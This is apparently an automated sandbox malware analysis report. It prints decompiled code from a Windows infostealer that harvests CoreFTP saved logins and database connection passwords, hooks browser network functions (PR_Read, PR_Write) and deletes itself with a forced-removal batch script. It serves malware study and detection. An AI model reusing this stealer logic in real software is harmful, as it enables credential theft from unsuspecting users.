				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v112;
				void* __esi;
				signed int _t113;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				void* _t119;
				signed int _t123;
				signed int _t124;
				signed char _t128;
				signed int _t131;
				signed char _t132;
				signed char _t138;
				intOrPtr _t151;
				signed int _t167;
				void* _t173;
				void* _t180;
				intOrPtr _t181;
				signed int _t187;
				void* _t189;
				void* _t191;
				signed int _t205;
				signed int _t206;

				_t180 = __edx;
				E00407B30();
				if(E00407B3F() == 0 || _a8 == 0 || _a12 <= 0) {
					L9:
					_t113 =  *0x41ac28(_a4, _a8, _a12);
					goto L10;
				} else {
					EnterCriticalSection(0x41ac38);
					_t195 = _a4;
					_t187 = E0041400F(_a4);
					_v68 = _t187;
					if(_t187 == 0xffffffff) {
						L8:
						LeaveCriticalSection(0x41ac38);
						goto L9;
					}
					_t189 = _t187 * 0x38 +  *0x41ac54;
					if( *((intOrPtr*)(_t189 + 0x20)) > 0) {
						L29:
						_t115 =  *(_t189 + 0x24);
						_t191 =  *((intOrPtr*)(_t189 + 0x20)) - _t115;
						LeaveCriticalSection(0x41ac38);
						_t198 = _a4;
						_t116 =  *0x41ac28(_a4,  *((intOrPtr*)(_t189 + 0x1c)) + _t115, _t191);
						_v72 = _t116;
						__eflags = _t116 - 0xffffffff;
						if(_t116 != 0xffffffff) {
							EnterCriticalSection(0x41ac38);
							_t117 = E0041400F(_t198);
							__eflags = _t117 - 0xffffffff;
							if(_t117 != 0xffffffff) {
								_t167 = _v72;
								_t119 = _t117 * 0x38 +  *0x41ac54;
								__eflags = _t167 - _t191;
								if(_t167 != _t191) {
									 *((intOrPtr*)(_t119 + 0x24)) =  *((intOrPtr*)(_t119 + 0x24)) + _t167;
									_t93 = _t119 + 0x28;
									 *_t93 =  *(_t119 + 0x28) - 1;
									__eflags =  *_t93;
									_v72 = 1;
								} else {
									_t89 = _t119 + 0x1c; // -4303928
									_v72 =  *(_t119 + 0x28);
									E004097F7( *_t89);
									E00409898(_t89, 0x10);
								}
							} else {
								_v72 = _v72 | _t117;
								 *0x41ac34(0xffffe890, 8);
							}
							LeaveCriticalSection(0x41ac38);
						}
						L36:
						_t113 = _v72;
						L10:
						return _t113;
					}
					if( *(_t189 + 8) > 0) {
						L38:
						LeaveCriticalSection(0x41ac38);
						_t200 = _a4;
						_t123 =  *0x41ac28(_a4, _a8, _a12);
						_v72 = _t123;
						__eflags = _t123 - 0xffffffff;
						if(_t123 != 0xffffffff) {
							EnterCriticalSection(0x41ac38);
							_t124 = E0041400F(_t200);
							__eflags = _t124 - 0xffffffff;
							if(_t124 != 0xffffffff) {
								_t173 = _t124 * 0x38 +  *0x41ac54;
								_t181 =  *((intOrPtr*)(_t173 + 8));
								__eflags = _v72 - _t181;
								if(_v72 > _t181) {
									E004140CB(_t124);
								} else {
									 *((intOrPtr*)(_t173 + 8)) = _t181 - _v72;
								}
							} else {
								_v72 = _v72 | _t124;
								 *0x41ac34(0xffffe890, 8);
							}
							LeaveCriticalSection(0x41ac38);
						}
						goto L36;
					}
					_t176 = _a8;
					_t128 = E004141DC(_a12, _a8,  &_v60, _t195);
					_v68 = _t128;
					if(_t128 != 0xffffffff) {
						__eflags = _v60;
						if(_v60 == 0) {
							L37:
							E004047CF( &_v60);
							_t131 = _v64 + _a12;
							__eflags = _t131;
							 *(_t189 + 8) = _t131;
							goto L38;
						}
						_t132 = E00404065(_t180,  &_v60);
						_v68 = _t132;
						__eflags = _t132 & 0x00000001;
						if((_t132 & 0x00000001) == 0) {
							_v76 = _v76 & 0x00000000;
							_v72 = _v72 & 0x00000000;
							__eflags = _t132 & 0x00000002;
							if(__eflags != 0) {
								_t206 = E0040984A(__eflags, _a8, _a12);
								_v84 = _t206;
								__eflags = _t206;
								if(_t206 != 0) {
									E00404821( *((intOrPtr*)(_t189 + 0x10)),  *((intOrPtr*)(_t189 + 0xc)));
									E004097F7( *(_t189 + 0x14));
									E004097F7( *((intOrPtr*)(_t189 + 4)));
									_t151 = E00409B94(_v64, _v68);
									 *(_t189 + 0x14) =  *(_t189 + 0x14) & 0x00000000;
									_t39 = _t189 + 0x18;
									 *_t39 =  *(_t189 + 0x18) & 0x00000000;
									__eflags =  *_t39;
									 *((intOrPtr*)(_t189 + 4)) = _t151;
									 *((intOrPtr*)(_t189 + 0xc)) = _v36;
									 *((intOrPtr*)(_t189 + 0x10)) = _v32;
									_v112 = E0040FDE7(E0040FDE7(E0040FE63(_t206, _a12, "Accept-Encoding", "identity"), _t176, _t206, "TE"), _t176, _t206, "If-Modified-Since");
								} else {
									E00404821(_v16, _v20);
								}
							}
							__eflags = _v68 & 0x00000004;
							if((_v68 & 0x00000004) == 0) {
								L27:
								__eflags = _v76;
								if(_v76 == 0) {
									goto L37;
								}
								E004047CF( &_v60);
								_t71 = _t189 + 0x24;
								 *_t71 =  *(_t189 + 0x24) & 0x00000000;
								__eflags =  *_t71;
								 *(_t189 + 8) = _v64;
								 *((intOrPtr*)(_t189 + 0x1c)) = _v76;
								 *((intOrPtr*)(_t189 + 0x20)) = _v72;
								 *(_t189 + 0x28) = _a12;
								goto L29;
							}
							_t205 = _v76;
							__eflags = _t205;
							if(_t205 != 0) {
								_t138 = _v72;
							} else {
								_t205 = _a8;
								_t138 = _a12;
							}
							_v68 = _t138;
							_v88 = E0041447E(_v68, _t205, _v28, _v24,  &_v76);
							E004097F7(_v44);
							__eflags = _v92;
							if(_v92 != 0) {
								__eflags = _t205 - _a8;
								if(_t205 != _a8) {
									E004097F7(_t205);
								}
							} else {
								__eflags = _t205 - _a8;
								if(_t205 == _a8) {
									goto L37;
								}
								_v76 = _t205;
								_v72 = _v68;
							}
							goto L27;
						} else {
							E004047CF( &_v60);
							LeaveCriticalSection(0x41ac38);
							_t113 =  *0x41ac34(0xffffe8a3, 0) | 0xffffffff;
							goto L10;
						}
					} else {
						E004140CB(_v68);
						E004047CF( &_v60);
						goto L8;
					}
				}
			}

0x00414c47
0x00414c53
0x00414c5f
0x00414cd7
0x00414ce0
0x00000000
0x00414c6d
0x00414c73
0x00414c79
0x00414c81
0x00414c83
0x00414c8a
0x00414cd0
0x00414cd1
0x00000000
0x00414cd1
0x00414c8f
0x00414c99
0x00414e71
0x00414e71
0x00414e7d
0x00414e7f
0x00414e87
0x00414e8b
0x00414e94
0x00414e98
0x00414e9b
0x00414e9e
0x00414ea4
0x00414ea9
0x00414eac
0x00414ec3
0x00414eca
0x00414ed0
0x00414ed2
0x00414eef
0x00414ef2
0x00414ef2
0x00414ef2
0x00414ef5
0x00414ed4
0x00414ed7
0x00414edc
0x00414ee0
0x00414ee8
0x00414ee8
0x00414eae
0x00414eae
0x00414eb9
0x00414ec0
0x00414efe
0x00414efe
0x00414f04
0x00414f04
0x00414ce9
0x00414cef
0x00414cef
0x00414ca3
0x00414f22
0x00414f29
0x00414f2e
0x00414f35
0x00414f3e
0x00414f42
0x00414f45
0x00414f48
0x00414f4e
0x00414f53
0x00414f56
0x00414f72
0x00414f78
0x00414f7b
0x00414f7f
0x00414f8a
0x00414f81
0x00414f85
0x00414f85
0x00414f58
0x00414f58
0x00414f63
0x00414f6a
0x00414f90
0x00414f90
0x00000000
0x00414f45
0x00414cac
0x00414cb4
0x00414cb9
0x00414cc0
0x00414cf0
0x00414cf5
0x00414f0d
0x00414f11
0x00414f1d
0x00414f1d
0x00414f1f
0x00000000
0x00414f1f
0x00414cff
0x00414d04
0x00414d08
0x00414d0a
0x00414d2c
0x00414d31
0x00414d36
0x00414d38
0x00414d49
0x00414d4b
0x00414d4f
0x00414d51
0x00414d68
0x00414d70
0x00414d78
0x00414d85
0x00414d8a
0x00414d8e
0x00414d8e
0x00414d8e
0x00414d97
0x00414da6
0x00414dae
0x00414dce
0x00414d53
0x00414d5b
0x00414d5b
0x00414d51
0x00414dd2
0x00414dd7
0x00414e3e
0x00414e3e
0x00414e43
0x00000000
0x00000000
0x00414e4d
0x00414e56
0x00414e56
0x00414e56
0x00414e5a
0x00414e61
0x00414e68
0x00414e6e
0x00000000
0x00414e6e
0x00414dd9
0x00414ddd
0x00414ddf
0x00414de9
0x00414de1
0x00414de1
0x00414de4
0x00414de4
0x00414ded
0x00414e0c
0x00414e10
0x00414e15
0x00414e1a
0x00414e33
0x00414e36
0x00414e39
0x00414e39
0x00414e1c
0x00414e1c
0x00414e1f
0x00000000
0x00000000
0x00414e29
0x00414e2d
0x00414e2d
0x00000000
0x00414d0c
0x00414d0c
0x00414d12
0x00414d27
0x00000000
0x00414d27
0x00414cc2
0x00414cc6
0x00414ccb
0x00000000
0x00414ccb
0x00414cc0

APIs

Part of subcall function 00407B30: WaitForSingleObject.KERNEL32(000000FF,004034D2), ref: 00407B38

Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47

EnterCriticalSection.KERNEL32(0041AC38), ref: 00414C73
LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414CD1
LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414D12
LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414E7F
EnterCriticalSection.KERNEL32(0041AC38), ref: 00414E9E
LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414EFE
LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414F29
EnterCriticalSection.KERNEL32(0041AC38), ref: 00414F48
LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414F90

Strings

identity, xrefs: 00414D92
Accept-Encoding, xrefs: 00414D9E
If-Modified-Since, xrefs: 00414DC2

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter$ObjectSingleWait
String ID: Accept-Encoding$If-Modified-Since$identity
API String ID: 3286975823-3034467039
Opcode ID: 6b75ca8fcb1d5dd1ae7d7aaccec484ad8a2ee9c86435da5fa1e5b11890c606e4
Instruction ID: 5d395e0899c0315ea4f0436bca466b8aaf046ffc41b85865ac9f3a483485f5e4
Opcode Fuzzy Hash: 6b75ca8fcb1d5dd1ae7d7aaccec484ad8a2ee9c86435da5fa1e5b11890c606e4
Instruction Fuzzy Hash: 6BA1A2715053019FC710EF24DD45A9EBBE1BFC8324F104A2EF554A32A1D738E995CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00406929, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 140
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00406929(void* __edx) {
				void* _v8;
				char _v12;
				void* _v16;
				int _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v556;
				void* __edi;
				void* __esi;
				void* _t40;
				void* _t44;
				char _t51;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				void* _t60;
				void* _t61;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t75;
				void* _t76;

				_t70 = __edx;
				E004098AA( &_v28,  &_v28, 0, 8);
				_t40 = HeapAlloc( *0x41a570, 8, 0xc20);
				_v16 = _t40;
				if(_t40 == 0) {
					return _t40;
				}
				_v32 = _t40 + 0x3fc;
				if(RegOpenKeyExW(0x80000001, L"SOFTWARE\\ftpware\\coreftp\\sites", 0, 8,  &_v8) != 0) {
					L19:
					_t44 = E004097F7(_v16);
					_t80 = _v24;
					if(_v24 > 0) {
						E00412508(_t44, _v28, _t70, _t80, L"CoreFTP");
					}
					return E004097F7(_v28);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v12);
					_push( &_v556);
					_v20 = 0;
					_push(0);
					while(1) {
						_v12 = 0x104;
						if(RegEnumKeyExW(_v8, ??, ??, ??, ??, ??, ??, ??) != 0) {
							break;
						}
						_t73 = _v16;
						_v20 = _v20 + 1;
						_t51 = E0040ED7B(0xff, _v16, _v8,  &_v556, L"host");
						_v12 = _t51;
						__eflags = _t51 - 0xffffffff;
						if(_t51 == 0xffffffff) {
							L16:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push( &_v12);
							_push( &_v556);
							_push(_v20);
							continue;
						}
						__eflags = _t51;
						if(_t51 <= 0) {
							goto L16;
						}
						_t55 = E0040ED7B(0xff, _t73 + 0x1fe, _v8,  &_v556, L"user");
						_v12 = _t55;
						__eflags = _t55 - 0xffffffff;
						if(_t55 == 0xffffffff) {
							goto L16;
						}
						__eflags = _t55;
						if(_t55 <= 0) {
							goto L16;
						}
						_t75 = _v32;
						_t57 = E0040ED7B(0xff, _t75, _v8,  &_v556, L"pw");
						_v12 = _t57;
						__eflags = _t57 - 0xffffffff;
						if(_t57 == 0xffffffff) {
							goto L16;
						}
						__eflags = _t57;
						if(_t57 <= 0) {
							goto L16;
						}
						_t68 = _t75;
						_t58 = E0040A3AA(_t75);
						__eflags = _t58;
						if(_t58 <= 0) {
							goto L16;
						}
						_t60 = E0040EDD3(_t68, _v8,  &_v556, L"port");
						__eflags = _t60 - 1;
						if(_t60 < 1) {
							L12:
							_t60 = 0x15;
							L13:
							_push(_t60);
							_t61 = _v16;
							_push(_t61);
							_push(_t75);
							_push(_t61 + 0x1fe);
							_t70 = 0x311;
							_t72 = _t75 + 0x1fe;
							_t63 = E0040A4B7(_t61 + 0x1fe, 0x311, _t75 + 0x1fe, L"ftp://%s:%s@%s:%u\n");
							_t76 = _t76 + 0x14;
							__eflags = _t63;
							if(_t63 > 0) {
								_t64 = E00409B2A(_t63,  &_v28, _t72);
								__eflags = _t64;
								if(_t64 != 0) {
									_t26 =  &_v24;
									 *_t26 = _v24 + 1;
									__eflags =  *_t26;
								}
							}
							goto L16;
						}
						__eflags = _t60 - 0xffff;
						if(_t60 <= 0xffff) {
							goto L13;
						}
						goto L12;
					}
					RegCloseKey(_v8);
					goto L19;
				}
			}

0x00406929
0x0040693e
0x00406950
0x00406956
0x0040695b
0x00406ae3
0x00406ae3
0x00406966
0x00406982
0x00406abd
0x00406ac0
0x00406ac5
0x00406ac8
0x00406ad2
0x00406ad2
0x00000000
0x00406988
0x00406988
0x00406989
0x0040698a
0x0040698b
0x0040698f
0x00406996
0x00406997
0x0040699a
0x00406a9c
0x00406a9f
0x00406aae
0x00000000
0x00000000
0x004069a0
0x004069a3
0x004069ba
0x004069bf
0x004069c2
0x004069c5
0x00406a8a
0x00406a8a
0x00406a8b
0x00406a8c
0x00406a8d
0x00406a91
0x00406a98
0x00406a99
0x00000000
0x00406a99
0x004069cb
0x004069cd
0x00000000
0x00000000
0x004069e8
0x004069ed
0x004069f0
0x004069f3
0x00000000
0x00000000
0x004069f9
0x004069fb
0x00000000
0x00000000
0x00406a01
0x00406a13
0x00406a18
0x00406a1b
0x00406a1e
0x00000000
0x00000000
0x00406a20
0x00406a22
0x00000000
0x00000000
0x00406a24
0x00406a26
0x00406a2b
0x00406a2d
0x00000000
0x00000000
0x00406a3e
0x00406a43
0x00406a46
0x00406a4f
0x00406a51
0x00406a52
0x00406a52
0x00406a53
0x00406a56
0x00406a57
0x00406a5d
0x00406a63
0x00406a68
0x00406a6e
0x00406a73
0x00406a76
0x00406a78
0x00406a7e
0x00406a83
0x00406a85
0x00406a87
0x00406a87
0x00406a87
0x00406a87
0x00406a85
0x00000000
0x00406a78
0x00406a48
0x00406a4d
0x00000000
0x00000000
0x00000000
0x00406a4d
0x00406ab7
0x00000000
0x00406ab7

APIs

HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00406950
RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\ftpware\coreftp\sites,00000000,00000008,?), ref: 0040697A
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00406AA6
RegCloseKey.ADVAPI32(?), ref: 00406AB7

Strings

SOFTWARE\ftpware\coreftp\sites, xrefs: 00406970
ftp://%s:%s@%s:%u, xrefs: 00406A5E
user, xrefs: 004069D3
CoreFTP, xrefs: 00406ACD
port, xrefs: 00406A2F
host, xrefs: 004069A6

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: AllocCloseEnumHeapOpen
String ID: CoreFTP$SOFTWARE\ftpware\coreftp\sites$ftp://%s:%s@%s:%u$host$port$user
API String ID: 3497950970-3090913592
Opcode ID: 3e742d8d345e02e9aca0361be674e097ef32b1db3b0ac7a563214aaf2679d49c
Instruction ID: fc2830438999c0e0f7ab349c7f10e4ddf1b9293e4bcbd5b135396d6ce1e7e282
Opcode Fuzzy Hash: 3e742d8d345e02e9aca0361be674e097ef32b1db3b0ac7a563214aaf2679d49c
Instruction Fuzzy Hash: 3F415C71A00109BEEB10ABE1CC85EEF767CEB05314F204577F612B22E1D6789E958B68

Uniqueness

Uniqueness Score: -1.00%

Function 00408E58, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 101
sleepCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00408E58(void* __ecx, void* __eflags) {
				char _v1164;
				char _v1668;
				char _v1676;
				short _v1684;
				char _v2192;
				char _v2196;
				short _v2204;
				char _v2716;
				char _v2724;
				char _v2988;
				short _v3076;
				char _v3084;
				char _v3085;
				char _v3088;
				char _v3101;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t61;
				WCHAR* _t62;
				WCHAR* _t63;
				WCHAR* _t64;
				void* _t67;

				_t57 = __ecx;
				_push(_t67);
				_t61 =  &_v1668;
				E00407BD4(__ecx, _t61, _t67, 0);
				PathRemoveFileSpecW(_t61);
				_t62 =  &_v2192;
				E00407BD4(_t57, _t62, PathRemoveFileSpecW, 1);
				PathRemoveFileSpecW(_t62);
				 *0x4192d0 =  *0x4192d0 | 0x00000002;
				_push(0);
				E00408473();
				E004079D9(0xff220823,  &_v3088, 0);
				_v3101 = 0;
				_t63 = L"Software\\Microsoft\\Windows\\Currentversion\\Run";
				while(SHDeleteValueW(0x80000001, _t63,  &_v3076) == 0) {
					Sleep(0x1f4);
					if(E0040EF91(_t57, _t63,  &_v3084) != 0) {
						_v3085 = _v3085 + 1;
						_t81 = _v3085 - 5;
						if(_v3085 < 5) {
							continue;
						}
					}
					break;
				}
				E0040B41D( &_v1676, _t81);
				E0040B41D( &_v2196, _t81);
				_t64 =  &_v2716;
				E00407BD4( &_v2196, _t64, 0x80000001, 2);
				SHDeleteKeyW(0x80000001, _t64);
				CharToOemW( &_v1684,  &_v2724);
				CharToOemW( &_v2204,  &_v2988);
				_push( &_v2988);
				_push( &_v2724);
				_push( &_v2988);
				_push( &_v2724);
				if(E0040A4FB( &_v2724, 0x474,  &_v1164, ":d\r\nrd /S /Q \"%s\"\r\nrd /S /Q \"%s\"\r\nif exist \"%s\" goto d\r\nif exist \"%s\" goto d") > 0) {
					E0040EABE(0,  &_v1164);
				}
				if( *0x41979c == 0xffffffff) {
					ExitProcess(0);
				}
				return 1;
			}

0x00408e58
0x00408e65
0x00408e6a
0x00408e71
0x00408e7f
0x00408e83
0x00408e8a
0x00408e92
0x00408e94
0x00408e9b
0x00408e9c
0x00408eac
0x00408eb1
0x00408eb5
0x00408ebf
0x00408ed5
0x00408ee8
0x00408eea
0x00408eee
0x00408ef3
0x00000000
0x00000000
0x00408ef3
0x00000000
0x00408ee8
0x00408efc
0x00408f08
0x00408f0f
0x00408f16
0x00408f1f
0x00408f3b
0x00408f4a
0x00408f50
0x00408f58
0x00408f60
0x00408f68
0x00408f84
0x00408f89
0x00408f89
0x00408f95
0x00408f98
0x00408f98
0x00408fa6

APIs

PathRemoveFileSpecW.SHLWAPI(?,00000000), ref: 00408E7F
PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 00408E92

Part of subcall function 00408473: SetEvent.KERNEL32(00408EA1,00000000), ref: 00408479
Part of subcall function 00408473: WaitForSingleObject.KERNEL32(FFFFFFFF,000000FF), ref: 0040848C

SHDeleteValueW.SHLWAPI(80000001,Software\Microsoft\Windows\Currentversion\Run,00000000,FF220823,00000000,00000000,00000000), ref: 00408EC6
Sleep.KERNEL32(000001F4), ref: 00408ED5

Part of subcall function 0040EF91: RegOpenKeyExW.ADVAPI32(80000001,77E49EB0,00000000,00000001,00000000,Software\Microsoft\Internet Explorer\Privacy,00000000,?,?,00412E9B,Software\Microsoft\Internet Explorer\Privacy,CleanCookies,80000001,Software\Microsoft\Internet Explorer\PhishingFilter,00000000), ref: 0040EFB3
Part of subcall function 0040EF91: RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,Software\Microsoft\Internet Explorer\Privacy,00000000,?,?,00412E9B,Software\Microsoft\Internet Explorer\Privacy,CleanCookies,80000001,Software\Microsoft\Internet Explorer\PhishingFilter,00000000), ref: 0040EFC7
Part of subcall function 0040EF91: RegCloseKey.ADVAPI32(00000000,?,?,00412E9B,Software\Microsoft\Internet Explorer\Privacy,CleanCookies,80000001,Software\Microsoft\Internet Explorer\PhishingFilter,00000000,?,77E49EB0,00000000), ref: 0040EFDD

SHDeleteKeyW.SHLWAPI(80000001,?,00000002), ref: 00408F1F
CharToOemW.USER32 ref: 00408F3B
CharToOemW.USER32 ref: 00408F4A
ExitProcess.KERNEL32 ref: 00408F98

Strings

Software\Microsoft\Windows\Currentversion\Run, xrefs: 00408EB5, 00408EC4, 00408EE0
:drd /S /Q "%s"rd /S /Q "%s"if exist "%s" goto dif exist "%s" goto d, xrefs: 00408F69

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CharDeleteFilePathRemoveSpecValue$CloseEventExitObjectOpenProcessQuerySingleSleepWait
String ID: :drd /S /Q "%s"rd /S /Q "%s"if exist "%s" goto dif exist "%s" goto d$Software\Microsoft\Windows\Currentversion\Run
API String ID: 2884141258-1895817321
Opcode ID: 5992843e5619105d50cfe64e688419face4427fce1ae412a7edf3794053a5213
Instruction ID: 27dae312fcec22cb3b468773f8c76ee744b9c5fcd2cd83bfc443268b729f7dc5
Opcode Fuzzy Hash: 5992843e5619105d50cfe64e688419face4427fce1ae412a7edf3794053a5213
Instruction Fuzzy Hash: 8E31D672504344AFD720DB61DD45EDB779CEB84314F00487FB985E3192DB38AA04CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00404DB1, Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 41
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00404DB1(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
				void* _t6;
				void* _t12;
				void* _t13;
				void* _t14;

				_t14 = __edx;
				_t13 = __ecx;
				 *0x419140 = GetProcAddress(__edi, "PR_OpenTCPSocket");
				 *0x419150 = GetProcAddress(__edi, "PR_Close");
				 *0x419160 = GetProcAddress(__edi, "PR_Read");
				 *0x419170 = GetProcAddress(__edi, "PR_Write");
				ResetEvent( *0x419540);
				_push(0);
				_push(0x419140);
				_t6 = 4;
				_t12 = E00404B67(_t6, _t13, _t14);
				if(_t12 != 0) {
					E0041415B(__edi,  *0x419148,  *0x419158,  *0x419168,  *0x419178);
				}
				SetEvent( *0x419540);
				return _t12;
			}

0x00404db1
0x00404db1
0x00404dc7
0x00404dd4
0x00404de1
0x00404dee
0x00404df3
0x00404df9
0x00404dfb
0x00404e02
0x00404e08
0x00404e0c
0x00404e28
0x00404e28
0x00404e33
0x00404e3d

APIs

GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 00404DBF
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 00404DCC
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 00404DD9
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 00404DE6
ResetEvent.KERNEL32(?,00000000,00407783,?,00000000), ref: 00404DF3

Part of subcall function 00404B67: VirtualAllocEx.KERNEL32(000000FF,00000000,00000012,00003000,00000040,?,?,00000000,?,?,?,00404DB0,00419020,00000001,00407798,00000000), ref: 00404BA6
Part of subcall function 00404B67: ResetEvent.KERNEL32(?,?,00000000,?,?,?,00404DB0,00419020), ref: 00404BC2
Part of subcall function 00404B67: SetEvent.KERNEL32(?,?,00000000,?,?,?,00404DB0,00419020), ref: 00404C9F

SetEvent.KERNEL32(00419140,00000000,?,00000000,00407783,?,00000000), ref: 00404E33

Part of subcall function 0041415B: InitializeCriticalSection.KERNEL32(0041AC38,74B04EE0,00404E2D,00419140,00000000,?,00000000,00407783,?,00000000), ref: 00414171
Part of subcall function 0041415B: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 004141AD
Part of subcall function 0041415B: GetProcAddress.KERNEL32(PR_SetError), ref: 004141BF
Part of subcall function 0041415B: GetProcAddress.KERNEL32(PR_GetError), ref: 004141D1

Strings

PR_Write, xrefs: 00404DDB
PR_OpenTCPSocket, xrefs: 00404DB9
PR_Close, xrefs: 00404DC1
PR_Read, xrefs: 00404DCE

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: AddressProc$Event$Reset$AllocCriticalInitializeSectionVirtual
String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
API String ID: 2746672884-3954199073
Opcode ID: 19dcf1b562fd6698ebbfad3239ffc7a8068a609369cc3f646225dde36a539c0e
Instruction ID: f68731996ce1dc3816c835a3cfa57d29c91cc47d366084438b166cd5ef857572
Opcode Fuzzy Hash: 19dcf1b562fd6698ebbfad3239ffc7a8068a609369cc3f646225dde36a539c0e
Instruction Fuzzy Hash: 42F01D75940212BAE7111F72EC2DEC63FA9B7897547104437F601BB2B0D7B94880DB4C

Uniqueness

Uniqueness Score: -1.00%

Function 00406664, Relevance: 16.7, APIs: 5, Strings: 6, Instructions: 174
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00406664(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				intOrPtr _v532;
				char _v536;
				char* _v544;
				signed int _v548;
				char* _v552;
				char* _v556;
				void* _v564;
				char* _v568;
				char* _v572;
				char* _v576;
				void* __edi;
				void* __esi;
				void* _t60;
				char* _t61;
				char* _t63;
				char* _t66;
				char** _t71;
				char* _t79;
				void* _t83;
				char* _t84;
				char* _t85;
				char* _t99;
				char* _t100;
				char* _t105;
				char* _t111;
				char* _t112;
				signed int _t122;
				char* _t123;
				char** _t124;
				intOrPtr _t125;
				signed int _t126;
				void* _t128;

				_t128 = (_t126 & 0xfffffff8) - 0x234;
				if(E0040B635( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L31:
					return 1;
				}
				_t131 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_push( &_v524);
					_t60 = 2;
					_t61 = E0040B046(_t60,  &_v524,  &_v536);
					__eflags = _t61;
					if(_t61 == 0) {
						goto L31;
					}
					_t63 = E0040A016(_v532,  &_v564, _v536, 1, 0);
					_v556 = _t63;
					__eflags = _t63 - 0xffffffff;
					if(_t63 == 0xffffffff) {
						L30:
						E0040B0EE( &_v536);
						goto L31;
					}
					_t66 = HeapAlloc( *0x41a570, 8, 0x626);
					_v552 = _t66;
					__eflags = _t66;
					if(_t66 == 0) {
						L29:
						E004097F7(_v552);
						E00409813(_v548, _v568);
						goto L30;
					}
					_v548 = 0;
					__eflags = _v544;
					if(_v544 > 0) {
						do {
							_t122 = _v548 << 2;
							_t71 = _v564 + _t122;
							__eflags =  *_t71;
							if( *_t71 == 0) {
								goto L28;
							}
							_v564 = StrStrIA( *_t71, ";server=");
							_t111 = StrStrIA( *(_t122 + _v568), ";port=");
							_v568 = StrStrIA(_v572[_t122], ";user=");
							_t79 = StrStrIA(_v576[_t122], ";password=");
							__eflags = _v576;
							_t123 = _t79;
							if(_v576 == 0) {
								goto L28;
							}
							__eflags = _v572;
							if(_v572 == 0) {
								goto L28;
							}
							__eflags = _t123;
							if(_t123 == 0) {
								goto L28;
							}
							_v576 =  &(_v576[8]);
							_v572 =  &(_v572[6]);
							_t124 =  &(_t123[0xa]);
							E0040663C(_v576);
							E0040663C(_v572);
							E0040663C(_t124);
							__eflags = _t111;
							if(_t111 == 0) {
								L15:
								_t83 = 0x15;
								L16:
								_t112 = _v576;
								__eflags =  *_t112;
								if( *_t112 == 0) {
									goto L28;
								}
								_t105 = _v572;
